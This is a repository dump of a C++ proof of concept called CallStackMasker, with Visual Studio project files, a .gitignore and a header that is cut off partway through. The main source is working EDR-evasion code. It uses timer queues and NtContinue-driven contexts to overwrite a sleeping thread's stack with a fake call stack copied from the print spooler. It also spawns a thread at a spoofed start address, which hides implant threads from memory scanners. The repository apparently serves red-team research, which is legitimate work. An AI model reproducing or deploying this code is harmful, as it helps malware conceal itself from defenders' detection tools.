├── .gitignore ├── CallStackMasker.sln ├── CallStackMasker ├── CallStackMasker.cpp ├── CallStackMasker.vcxproj ├── CallStackMasker.vcxproj.filters └── CallStackUtils.h └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Aa][Rr][Mm]/ 27 | [Aa][Rr][Mm]64/ 28 | bld/ 29 | [Bb]in/ 30 | [Oo]bj/ 31 | [Ll]og/ 32 | [Ll]ogs/ 33 | 34 | # Visual Studio 2015/2017 cache/options directory 35 | .vs/ 36 | # Uncomment if you have tasks that create the project's static files in wwwroot 37 | #wwwroot/ 38 | 39 | # Visual Studio 2017 auto generated files 40 | Generated\ Files/ 41 | 42 | # MSTest test Results 43 | [Tt]est[Rr]esult*/ 44 | [Bb]uild[Ll]og.* 45 | 46 | # NUnit 47 | *.VisualState.xml 48 | TestResult.xml 49 | nunit-*.xml 50 | 51 | # Build Results of an ATL Project 52 | [Dd]ebugPS/ 53 | [Rr]eleasePS/ 54 | dlldata.c 55 | 56 | # Benchmark Results 57 | BenchmarkDotNet.Artifacts/ 58 | 59 | # .NET Core 60 | project.lock.json 61 | project.fragment.lock.json 62 | artifacts/ 63 | 64 | # StyleCop 65 | StyleCopReport.xml 66 | 67 | # Files built by Visual Studio 68 | *_i.c 69 | *_p.c 70 | *_h.h 71 | *.ilk 72 | *.meta 73 | *.obj 74 | *.iobj 75 | *.pch 76 | *.pdb 77 | *.ipdb 78 | *.pgc 79 | *.pgd 80 | *.rsp 81 | *.sbr 82 | *.tlb 83 | *.tli 84 | *.tlh 85 | *.tmp 86 | *.tmp_proj 87 | *_wpftmp.csproj 88 | *.log 89 | *.vspscc 90 | *.vssscc 91 | .builds 92 | *.pidb 93 | *.svclog 94 | *.scc 95 | 96 | # Chutzpah Test files 97 | _Chutzpah* 98 | 99 | # Visual C++ cache files 100 | ipch/ 101 | *.aps 102 | *.ncb 103 | *.opendb 104 | *.opensdf 105 | *.sdf 106 | *.cachefile 107 | *.VC.db 108 | *.VC.VC.opendb 109 | 110 | # Visual Studio profiler 111 | *.psess 112 | *.vsp 113 | *.vspx 114 | *.sap 115 | 116 | # Visual Studio Trace Files 117 | *.e2e 118 | 119 | # TFS 2012 Local Workspace 120 | $tf/ 121 | 122 | # Guidance Automation Toolkit 123 | *.gpState 124 | 125 | # ReSharper is a .NET coding add-in 126 | _ReSharper*/ 127 | *.[Rr]e[Ss]harper 128 | *.DotSettings.user 129 | 130 | # TeamCity is a build add-in 131 | _TeamCity* 132 | 133 | # DotCover is a Code Coverage Tool 134 | *.dotCover 135 | 136 | # AxoCover is a Code Coverage Tool 137 | .axoCover/* 138 | !.axoCover/settings.json 139 | 140 | # Visual Studio code coverage results 141 | *.coverage 142 | *.coveragexml 143 | 144 | # NCrunch 145 | _NCrunch_* 146 | .*crunch*.local.xml 147 | nCrunchTemp_* 148 | 149 | # MightyMoose 150 | *.mm.* 151 | AutoTest.Net/ 152 | 153 | # Web workbench (sass) 154 | .sass-cache/ 155 | 156 | # Installshield output folder 157 | [Ee]xpress/ 158 | 159 | # DocProject is a documentation generator add-in 160 | DocProject/buildhelp/ 161 | DocProject/Help/*.HxT 162 | DocProject/Help/*.HxC 163 | DocProject/Help/*.hhc 164 | DocProject/Help/*.hhk 165 | DocProject/Help/*.hhp 166 | DocProject/Help/Html2 167 | DocProject/Help/html 168 | 169 | # Click-Once directory 170 | publish/ 171 | 172 | # Publish Web Output 173 | *.[Pp]ublish.xml 174 | *.azurePubxml 175 | # Note: Comment the next line if you want to checkin your web deploy settings, 176 | # but database connection strings (with potential passwords) will be unencrypted 177 | *.pubxml 178 | *.publishproj 179 | 180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 181 | # checkin your Azure Web App publish settings, but sensitive information contained 182 | # in these scripts will be unencrypted 183 | PublishScripts/ 184 | 185 | # NuGet Packages 186 | *.nupkg 187 | # NuGet Symbol Packages 188 | *.snupkg 189 | # The packages folder can be ignored because of Package Restore 190 | **/[Pp]ackages/* 191 | # except build/, which is used as an MSBuild target. 192 | !**/[Pp]ackages/build/ 193 | # Uncomment if necessary however generally it will be regenerated when needed 194 | #!**/[Pp]ackages/repositories.config 195 | # NuGet v3's project.json files produces more ignorable files 196 | *.nuget.props 197 | *.nuget.targets 198 | 199 | # Microsoft Azure Build Output 200 | csx/ 201 | *.build.csdef 202 | 203 | # Microsoft Azure Emulator 204 | ecf/ 205 | rcf/ 206 | 207 | # Windows Store app package directories and files 208 | AppPackages/ 209 | BundleArtifacts/ 210 | Package.StoreAssociation.xml 211 | _pkginfo.txt 212 | *.appx 213 | *.appxbundle 214 | *.appxupload 215 | 216 | # Visual Studio cache files 217 | # files ending in .cache can be ignored 218 | *.[Cc]ache 219 | # but keep track of directories ending in .cache 220 | !?*.[Cc]ache/ 221 | 222 | # Others 223 | ClientBin/ 224 | ~$* 225 | *~ 226 | *.dbmdl 227 | *.dbproj.schemaview 228 | *.jfm 229 | *.pfx 230 | *.publishsettings 231 | orleans.codegen.cs 232 | 233 | # Including strong name files can present a security risk 234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 235 | #*.snk 236 | 237 | # Since there are multiple workflows, uncomment next line to ignore bower_components 238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 239 | #bower_components/ 240 | 241 | # RIA/Silverlight projects 242 | Generated_Code/ 243 | 244 | # Backup & report files from converting an old project file 245 | # to a newer Visual Studio version. Backup files are not needed, 246 | # because we have git ;-) 247 | _UpgradeReport_Files/ 248 | Backup*/ 249 | UpgradeLog*.XML 250 | UpgradeLog*.htm 251 | ServiceFabricBackup/ 252 | *.rptproj.bak 253 | 254 | # SQL Server files 255 | *.mdf 256 | *.ldf 257 | *.ndf 258 | 259 | # Business Intelligence projects 260 | *.rdl.data 261 | *.bim.layout 262 | *.bim_*.settings 263 | *.rptproj.rsuser 264 | *- [Bb]ackup.rdl 265 | *- [Bb]ackup ([0-9]).rdl 266 | *- [Bb]ackup ([0-9][0-9]).rdl 267 | 268 | # Microsoft Fakes 269 | FakesAssemblies/ 270 | 271 | # GhostDoc plugin setting file 272 | *.GhostDoc.xml 273 | 274 | # Node.js Tools for Visual Studio 275 | .ntvs_analysis.dat 276 | node_modules/ 277 | 278 | # Visual Studio 6 build log 279 | *.plg 280 | 281 | # Visual Studio 6 workspace options file 282 | *.opt 283 | 284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 285 | *.vbw 286 | 287 | # Visual Studio LightSwitch build output 288 | **/*.HTMLClient/GeneratedArtifacts 289 | **/*.DesktopClient/GeneratedArtifacts 290 | **/*.DesktopClient/ModelManifest.xml 291 | **/*.Server/GeneratedArtifacts 292 | **/*.Server/ModelManifest.xml 293 | _Pvt_Extensions 294 | 295 | # Paket dependency manager 296 | .paket/paket.exe 297 | paket-files/ 298 | 299 | # FAKE - F# Make 300 | .fake/ 301 | 302 | # CodeRush personal settings 303 | .cr/personal 304 | 305 | # Python Tools for Visual Studio (PTVS) 306 | __pycache__/ 307 | *.pyc 308 | 309 | # Cake - Uncomment if you are using it 310 | # tools/** 311 | # !tools/packages.config 312 | 313 | # Tabs Studio 314 | *.tss 315 | 316 | # Telerik's JustMock configuration file 317 | *.jmconfig 318 | 319 | # BizTalk build output 320 | *.btp.cs 321 | *.btm.cs 322 | *.odx.cs 323 | *.xsd.cs 324 | 325 | # OpenCover UI analysis results 326 | OpenCover/ 327 | 328 | # Azure Stream Analytics local run output 329 | ASALocalRun/ 330 | 331 | # MSBuild Binary and Structured Log 332 | *.binlog 333 | 334 | # NVidia Nsight GPU debugger configuration file 335 | *.nvuser 336 | 337 | # MFractors (Xamarin productivity tool) working folder 338 | .mfractor/ 339 | 340 | # Local History for Visual Studio 341 | .localhistory/ 342 | 343 | # BeatPulse healthcheck temp database 344 | healthchecksdb 345 | 346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 347 | MigrationBackup/ 348 | 349 | # Ionide (cross platform F# VS Code tools) working folder 350 | .ionide/ 351 | -------------------------------------------------------------------------------- /CallStackMasker.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.4.33205.214 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CallStackMasker", "CallStackMasker\CallStackMasker.vcxproj", "{041BC7B3-B050-48FA-B587-68172C9E0597}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {041BC7B3-B050-48FA-B587-68172C9E0597}.Debug|x64.ActiveCfg = Debug|x64 17 | {041BC7B3-B050-48FA-B587-68172C9E0597}.Debug|x64.Build.0 = Debug|x64 18 | {041BC7B3-B050-48FA-B587-68172C9E0597}.Debug|x86.ActiveCfg = Release|Win32 19 | {041BC7B3-B050-48FA-B587-68172C9E0597}.Release|x64.ActiveCfg = Release|x64 20 | {041BC7B3-B050-48FA-B587-68172C9E0597}.Release|x64.Build.0 = Release|x64 21 | {041BC7B3-B050-48FA-B587-68172C9E0597}.Release|x86.ActiveCfg = Release|Win32 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | GlobalSection(ExtensibilityGlobals) = postSolution 27 | SolutionGuid = {9202ACBE-EAF2-4F09-B535-AAE91C61A7DA} 28 | EndGlobalSection 29 | EndGlobal 30 | -------------------------------------------------------------------------------- /CallStackMasker/CallStackMasker.cpp: -------------------------------------------------------------------------------- 1 | #include "CallStackUtils.h" 2 | 3 | // Static spoofed call stack taken from spoolsv.exe via SysInternals' Process Explorer. 4 | // ntdll.dll!NtWaitForSingleObject + 0x14 5 | // KERNELBASE.dll!WaitForSingleObjectEx + 0x8e 6 | // localspl.dll!InitializePrintMonitor2 + 0xb7a 7 | // KERNEL32.DLL!BaseThreadInitThunk + 0x14 8 | // ntdll.dll!lRtlUserThreadStart + 0x21 9 | // Start address: localspl.dll!InitializePrintMonitor2 + 0xb20. 10 | std::vector spoofedCallStack = 11 | { 12 | StackFrame(L"C:\\Windows\\SYSTEM32\\kernelbase.dll", "WaitForSingleObjectEx", 0x8e, 0, FALSE), 13 | StackFrame(L"C:\\Windows\\SYSTEM32\\localspl.dll", "InitializePrintMonitor2", 0xb7a, 0 , TRUE), 14 | StackFrame(L"C:\\Windows\\SYSTEM32\\kernel32.dll", "BaseThreadInitThunk", 0x14, 0, FALSE), 15 | StackFrame(L"C:\\Windows\\SYSTEM32\\ntdll.dll", "RtlUserThreadStart", 0x21, 0, FALSE), 16 | }; 17 | 18 | // Global struct to store target thread info. 19 | threadToSpoof targetThreadToSpoof = {}; 20 | 21 | void MaskCallStack(DWORD SleepTime) 22 | { 23 | CONTEXT ctxThread = { 0 }; 24 | 25 | CONTEXT ropBackUpStack = { 0 }; 26 | CONTEXT ropSpoofStack = { 0 }; 27 | CONTEXT ropRestoreStack = { 0 }; 28 | CONTEXT ropSetEvent = { 0 }; 29 | 30 | HANDLE hTimerQueue = NULL; 31 | HANDLE hNewTimer = NULL; 32 | HANDLE hEvent = NULL; 33 | HANDLE hHeap = NULL; 34 | 35 | PVOID pNtContinue = GetProcAddress(GetModuleHandleA("Ntdll"), "NtContinue"); 36 | 37 | hTimerQueue = CreateTimerQueue(); 38 | hEvent = CreateEventW(0, 0, 0, 0); 39 | 40 | PVOID pCopyOfStack = NULL; 41 | void* pChildSP = NULL; 42 | void* pRsp = NULL; 43 | 44 | // [1] Create a buffer to back up current state of stack. 45 | hHeap = GetProcessHeap(); 46 | pCopyOfStack = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, targetThreadToSpoof.totalRequiredStackSize); 47 | 48 | // [2] Work out Child-SP of current frame. 49 | pChildSP = GetChildSP(); 50 | 51 | // [3] Calculate Rsp at the point when NtWaitForSingleObject sys call 52 | // is invoked so we know *where* to overwrite in memory. 53 | // Subtract from current Child-SP stack size of KERNELBASE!WaitForSingleObject + NtWaitForSingleObject (0x8). 54 | pRsp = (PCHAR)pChildSP - spoofedCallStack.front().totalStackSize - 0x8; 55 | //std::cout << "[+] Child-SP of current frame: 0x" << std::hex << pChildSP << "\n"; 56 | //std::cout << "[+] Value of Rsp when NtWaitForSingleObject syscall is invoked: 0x" << std::hex << pRsp << "\n"; 57 | 58 | // [4] Set up timers. 59 | if (CreateTimerQueueTimer(&hNewTimer, hTimerQueue, (WAITORTIMERCALLBACK)RtlCaptureContext, &ctxThread, 0, 0, WT_EXECUTEINTIMERTHREAD)) 60 | { 61 | WaitForSingleObject(hEvent, 0x32); 62 | 63 | memcpy(&ropBackUpStack, &ctxThread, sizeof(CONTEXT)); 64 | memcpy(&ropSpoofStack, &ctxThread, sizeof(CONTEXT)); 65 | memcpy(&ropRestoreStack, &ctxThread, sizeof(CONTEXT)); 66 | memcpy(&ropSetEvent, &ctxThread, sizeof(CONTEXT)); 67 | 68 | // Back up the stack. 69 | // NB This PoC uses VCRUNTIME140!memcpy but a native equivalent exported by ntdll is RtlCopyMemoryNonTemporal. 70 | // https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-rtlcopymemorynontemporal 71 | ropBackUpStack.Rsp -= 8; 72 | ropBackUpStack.Rip = (DWORD64)memcpy; // VCRUNTIME140!memcpy 73 | ropBackUpStack.Rcx = (DWORD64)pCopyOfStack; // Destination 74 | ropBackUpStack.Rdx = (DWORD64)pRsp; // Source 75 | ropBackUpStack.R8 = (DWORD64)targetThreadToSpoof.totalRequiredStackSize; // Length 76 | 77 | // Overwrite the stack with fake callstack. 78 | ropSpoofStack.Rsp -= 8; 79 | ropSpoofStack.Rip = (DWORD64)memcpy; 80 | ropSpoofStack.Rcx = (DWORD64)pRsp; // Destination 81 | ropSpoofStack.Rdx = (DWORD64)targetThreadToSpoof.pFakeStackBuffer; // Source 82 | ropSpoofStack.R8 = (DWORD64)targetThreadToSpoof.totalRequiredStackSize; // Length 83 | 84 | // Restore original call stack. 85 | ropRestoreStack.Rsp -= 8; 86 | ropRestoreStack.Rip = (DWORD64)memcpy; 87 | ropRestoreStack.Rcx = (DWORD64)pRsp; // Destination 88 | ropRestoreStack.Rdx = (DWORD64)pCopyOfStack; // Source 89 | ropRestoreStack.R8 = (DWORD64)targetThreadToSpoof.totalRequiredStackSize; // Length 90 | 91 | // Set event. 92 | ropSetEvent.Rsp -= 8; 93 | ropSetEvent.Rip = (DWORD64)SetEvent; 94 | ropSetEvent.Rcx = (DWORD64)hEvent; 95 | 96 | std::cout << "[+] Masking call stack of main thread...\n"; 97 | // The timings here could be modified as there is a small window when call stack is unmasked. 98 | CreateTimerQueueTimer(&hNewTimer, hTimerQueue, (WAITORTIMERCALLBACK)pNtContinue, &ropBackUpStack, 1, 0, WT_EXECUTEINTIMERTHREAD); 99 | CreateTimerQueueTimer(&hNewTimer, hTimerQueue, (WAITORTIMERCALLBACK)pNtContinue, &ropSpoofStack, 10, 0, WT_EXECUTEINTIMERTHREAD); 100 | CreateTimerQueueTimer(&hNewTimer, hTimerQueue, (WAITORTIMERCALLBACK)pNtContinue, &ropRestoreStack, SleepTime, 0, WT_EXECUTEINTIMERTHREAD); 101 | CreateTimerQueueTimer(&hNewTimer, hTimerQueue, (WAITORTIMERCALLBACK)pNtContinue, &ropSetEvent, SleepTime + 10, 0, WT_EXECUTEINTIMERTHREAD); 102 | } 103 | 104 | // [5] Wait for event to be set by timer. Call stack will be masked throughout this period. 105 | WaitForSingleObject(hEvent, INFINITE); 106 | 107 | // [6] Clean up. 108 | std::cout << "[+] Call stack currently unmasked...\n"; 109 | DeleteTimerQueue(hTimerQueue); 110 | HeapFree(hHeap, 0, pCopyOfStack); 111 | } 112 | 113 | void go() 114 | { 115 | do 116 | MaskCallStack(15000); 117 | while (TRUE); 118 | } 119 | 120 | int main(int argc, char* argv[]) 121 | { 122 | std::cout << "[+] Dynamic call stack spoofer via timers by @joehowwolf. Based on Ekko Sleep Obfuscation by C5pider.\n"; 123 | std::cout << "[!] Currently only supports waits of WaitReason: UserRequest via KERNELBASE!WaitForSingleObjectEx.\n"; 124 | 125 | BOOL bStaticCallStack = true; 126 | PVOID startAddr = 0; 127 | HANDLE hThread = INVALID_HANDLE_VALUE; 128 | DWORD dwThreadId = 0; 129 | CONTEXT ctx = { 0 }; 130 | 131 | // [0] Determine if the stack mask is to be static or dynamically spoofed. 132 | if (!NT_SUCCESS(HandleArgs(argc, argv, bStaticCallStack))) 133 | { 134 | return -1; 135 | } 136 | 137 | // [1] Initialise spoofed call stack. 138 | if (bStaticCallStack) 139 | { 140 | // Create a fake call stack layout in memory from static struct. 141 | std::cout << "[+] STATIC MODE: Initialising static call stack to spoof...\n"; 142 | if (!NT_SUCCESS(InitialiseStaticCallStackSpoofing(spoofedCallStack, targetThreadToSpoof))) 143 | { 144 | std::cout << "[-] Failed to initialise fake static call stack\n"; 145 | return -1; 146 | } 147 | 148 | // Set thread start address to localspl.dll!InitializePrintMonitor2 + 0xb20. 149 | startAddr = (PCHAR)(GetProcAddress(GetModuleHandleA("localspl"), "InitializePrintMonitor2")) + 0xb20; 150 | if (NULL == startAddr) 151 | { 152 | return -1; 153 | } 154 | } 155 | else 156 | { 157 | // Create a fake call stack by finding a thread in the desired state (e.g. wait:UserRequest) 158 | // and record its start address. Do this upfront because we *need* to know the start 159 | // address in order to spoof it now. 160 | std::cout << "[+] DYNAMIC MODE: Finding a suitable thread call stack to spoof...\n"; 161 | if (!NT_SUCCESS(InitialiseDynamicCallStackSpoofing(UserRequest, targetThreadToSpoof))) 162 | { 163 | std::cout << "[-] Failed to initialise dynamic static call stack\n"; 164 | return -1; 165 | } 166 | startAddr = targetThreadToSpoof.startAddr; 167 | } 168 | 169 | // [2] Start thread at fake start address. 170 | std::cout << "[+] Spawning new thread at spoofed start address: 0x" << std::hex << startAddr << "\n"; 171 | hThread = CreateThread( 172 | NULL, 173 | 0, 174 | (LPTHREAD_START_ROUTINE)startAddr, 175 | 0, 176 | CREATE_SUSPENDED, 177 | &dwThreadId); 178 | ctx.ContextFlags = CONTEXT_CONTROL; 179 | GetThreadContext(hThread, &ctx); 180 | ctx.Rip = (DWORD64)&go; 181 | SetThreadContext(hThread, &ctx); 182 | 183 | // [3] Resume thread. 184 | ResumeThread(hThread); 185 | CloseHandle(hThread); 186 | 187 | // [4] Exit current thread. 188 | ExitThread(0); 189 | } 190 | -------------------------------------------------------------------------------- /CallStackMasker/CallStackMasker.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {041bc7b3-b050-48fa-b587-68172c9e0597} 25 | CallStackMasker 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | %(AdditionalIncludeDirectories) 108 | 109 | 110 | Console 111 | true 112 | 113 | 114 | 115 | 116 | Level3 117 | true 118 | true 119 | true 120 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 121 | true 122 | %(AdditionalIncludeDirectories) 123 | 124 | 125 | Console 126 | true 127 | true 128 | true 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | -------------------------------------------------------------------------------- /CallStackMasker/CallStackMasker.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /CallStackMasker/CallStackUtils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "psapi.h" 9 | #pragma comment(lib,"ntdll.lib") 10 | 11 | // 12 | // From Ntdef.h. 13 | // 14 | // Treat anything not STATUS_SUCCESS as an error. 15 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) == 0) 16 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 17 | #define STATUS_UNSUCCESSFUL ((NTSTATUS) 0x00000001L) 18 | #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L) 19 | 20 | #define ThreadQuerySetWin32StartAddress 9 21 | #define SystemProcessInformation 5 22 | #define RBP_OP_INFO 0x5 23 | 24 | // Dynamic spoof options. 25 | // NB This PoC only supports WaitForSingleObjectEx. 26 | std::string targetWaitModule("kernelbase"); 27 | std::string targetWaitFunction("WaitForSingleObjectEx"); 28 | 29 | // Struct to store info on target thread to copy. 30 | typedef struct 31 | { 32 | DWORD dwPid; 33 | DWORD dwTid; 34 | PVOID startAddr; 35 | ULONG totalRequiredStackSize; 36 | PVOID pFakeStackBuffer; 37 | } threadToSpoof; 38 | 39 | /* 40 | Structs to call NtQuerySystemInformation. 41 | Based on: https://github.com/thefLink/Hunt-Sleeping-Beacons/blob/main/source/Nt.h 42 | */ 43 | typedef NTSTATUS(WINAPI* pNtQueryInformationThread)(HANDLE, LONG, PVOID, ULONG, PULONG); 44 | typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(int, PVOID, ULONG, PULONG); 45 | 46 | typedef struct _CLIENT_ID { 47 | HANDLE UniqueProcess; 48 | HANDLE UniqueThread; 49 | } CLIENT_ID; 50 | 51 | typedef struct 52 | { 53 | SIZE_T PeakVirtualSize; 54 | SIZE_T VirtualSize; 55 | ULONG PageFaultCount; 56 | SIZE_T PeakWorkingSetSize; 57 | SIZE_T WorkingSetSize; 58 | SIZE_T QuotaPeakPagedPoolUsage; 59 | SIZE_T QuotaPagedPoolUsage; 60 | SIZE_T QuotaPeakNonPagedPoolUsage; 61 | SIZE_T QuotaNonPagedPoolUsage; 62 | SIZE_T PagefileUsage; 63 | SIZE_T PeakPagefileUsage; 64 | } VM_COUNTERS; 65 | 66 | typedef struct 67 | { 68 | LARGE_INTEGER KernelTime; 69 | LARGE_INTEGER UserTime; 70 | LARGE_INTEGER CreateTime; 71 | ULONG WaitTime; 72 | PVOID StartAddress; 73 | CLIENT_ID ClientId; 74 | LONG Priority; 75 | LONG BasePriority; 76 | ULONG ContextSwitches; 77 | ULONG ThreadState; 78 | ULONG WaitReason; 79 | } SYSTEM_THREAD_INFORMATION; 80 | 81 | typedef struct 82 | { 83 | USHORT Length; 84 | USHORT MaximumLength; 85 | PWSTR Buffer; 86 | } UNICODE_STRING; 87 | 88 | typedef struct 89 | { 90 | ULONG NextEntryOffset; 91 | ULONG NumberOfThreads; 92 | LARGE_INTEGER WorkingSetPrivateSize; 93 | ULONG HardFaultCount; 94 | ULONG NumberOfThreadsHighWatermark; 95 | ULONGLONG CycleTime; 96 | FILETIME CreateTime; 97 | FILETIME UserTime; 98 | FILETIME KernelTime; 99 | UNICODE_STRING ImageName; 100 | LONG BasePriority; 101 | #ifdef _WIN64 102 | ULONG pad1; 103 | #endif 104 | ULONG ProcessId; 105 | #ifdef _WIN64 106 | ULONG pad2; 107 | #endif 108 | ULONG InheritedFromProcessId; 109 | #ifdef _WIN64 110 | ULONG pad3; 111 | #endif 112 | ULONG HandleCount; 113 | ULONG SessionId; 114 | ULONG_PTR UniqueProcessKey; 115 | VM_COUNTERS VirtualMemoryCounters; 116 | ULONG_PTR PrivatePageCount; 117 | IO_COUNTERS IoCounters; 118 | SYSTEM_THREAD_INFORMATION ThreadInfos[1]; 119 | } SYSTEM_PROCESS_INFORMATION; 120 | 121 | /* 122 | Thread WaitReason enum, based on https://gist.github.com/TheWover/799822ce3d1239e0bd5764ac0b0adfda. 123 | */ 124 | typedef enum _KWAIT_REASON 125 | { 126 | Executive, 127 | FreePage, 128 | PageIn, 129 | PoolAllocation, 130 | DelayExecution, 131 | Suspended, 132 | UserRequest, 133 | WrExecutive, 134 | WrFreePage, 135 | WrPageIn, 136 | WrPoolAllocation, 137 | WrDelayExecution, 138 | WrSuspended, 139 | WrUserRequest, 140 | WrEventPair, 141 | WrQueue, 142 | WrLpcReceive, 143 | WrLpcReply, 144 | WrVirtualMemory, 145 | WrPageOut, 146 | WrRendezvous, 147 | WrKeyedEvent, 148 | WrTerminated, 149 | WrProcessInSwap, 150 | WrCpuRateControl, 151 | WrCalloutStack, 152 | WrKernel, 153 | WrResource, 154 | WrPushLock, 155 | WrMutex, 156 | WrQuantumEnd, 157 | WrDispatchInt, 158 | WrPreempted, 159 | WrYieldExecution, 160 | WrFastMutex, 161 | WrGuardedMutex, 162 | WrRundown, 163 | WrAlertByThreadId, 164 | WrDeferredPreempt, 165 | MaximumWaitReason 166 | } KWAIT_REASON, * PKWAIT_REASON; 167 | 168 | /* 169 | The utility functions/structs below are based on the following two PoCs: 170 | - https://github.com/WithSecureLabs/CallStackSpoofer 171 | - https://github.com/WithSecureLabs/TickTock 172 | Full credit to @WithSecureLabs. 173 | */ 174 | 175 | // 176 | // A lookup map for modules and their corresponding image base. 177 | // 178 | typedef std::map imageMap; 179 | // std::wstring equivalent. 180 | std::map imageBaseMap; 181 | 182 | // 183 | // Used to store information for individual stack frames for call stack to spoof. 184 | // 185 | struct StackFrame { 186 | std::wstring targetDll; 187 | std::string targetFunc; 188 | ULONG offset; 189 | ULONG totalStackSize; 190 | BOOL requiresLoadLibrary; 191 | BOOL setsFramePointer; 192 | PVOID returnAddress; 193 | BOOL pushRbp; 194 | ULONG countOfCodes; 195 | BOOL pushRbpIndex; 196 | StackFrame() = default; 197 | StackFrame(std::wstring dllPath, std::string function, ULONG targetOffset, ULONG targetStackSize, bool bDllLoad) : 198 | targetDll(dllPath), 199 | targetFunc(function), 200 | offset(targetOffset), 201 | totalStackSize(targetStackSize), 202 | requiresLoadLibrary(bDllLoad), 203 | setsFramePointer(false), 204 | returnAddress(0), 205 | pushRbp(false), 206 | countOfCodes(0), 207 | pushRbpIndex(0) 208 | { 209 | }; 210 | }; 211 | 212 | // 213 | // Unwind op codes: https://docs.microsoft.com/en-us/cpp/build/exception-handling-x64?view=msvc-170. 214 | // 215 | typedef enum _UNWIND_OP_CODES { 216 | UWOP_PUSH_NONVOL = 0, /* info == register number */ 217 | UWOP_ALLOC_LARGE, /* no info, alloc size in next 2 slots */ 218 | UWOP_ALLOC_SMALL, /* info == size of allocation / 8 - 1 */ 219 | UWOP_SET_FPREG, /* no info, FP = RSP + UNWIND_INFO.FPRegOffset*16 */ 220 | UWOP_SAVE_NONVOL, /* info == register number, offset in next slot */ 221 | UWOP_SAVE_NONVOL_FAR, /* info == register number, offset in next 2 slots */ 222 | UWOP_SAVE_XMM128 = 8, /* info == XMM reg number, offset in next slot */ 223 | UWOP_SAVE_XMM128_FAR, /* info == XMM reg number, offset in next 2 slots */ 224 | UWOP_PUSH_MACHFRAME /* info == 0: no error-code, 1: error-code */ 225 | } UNWIND_CODE_OPS; 226 | 227 | // 228 | // Calculates the image base for the given stack frame 229 | // and adds it to the image base map. 230 | // 231 | NTSTATUS GetImageBase(const StackFrame& stackFrame) 232 | { 233 | NTSTATUS status = STATUS_SUCCESS; 234 | HMODULE tmpImageBase = 0; 235 | 236 | // [0] Check if image base has already been resolved. 237 | if (imageBaseMap.count(stackFrame.targetDll)) 238 | { 239 | goto Cleanup; 240 | } 241 | 242 | // [1] Check if current frame contains a 243 | // non standard dll and load if so. 244 | if (stackFrame.requiresLoadLibrary) 245 | { 246 | tmpImageBase = 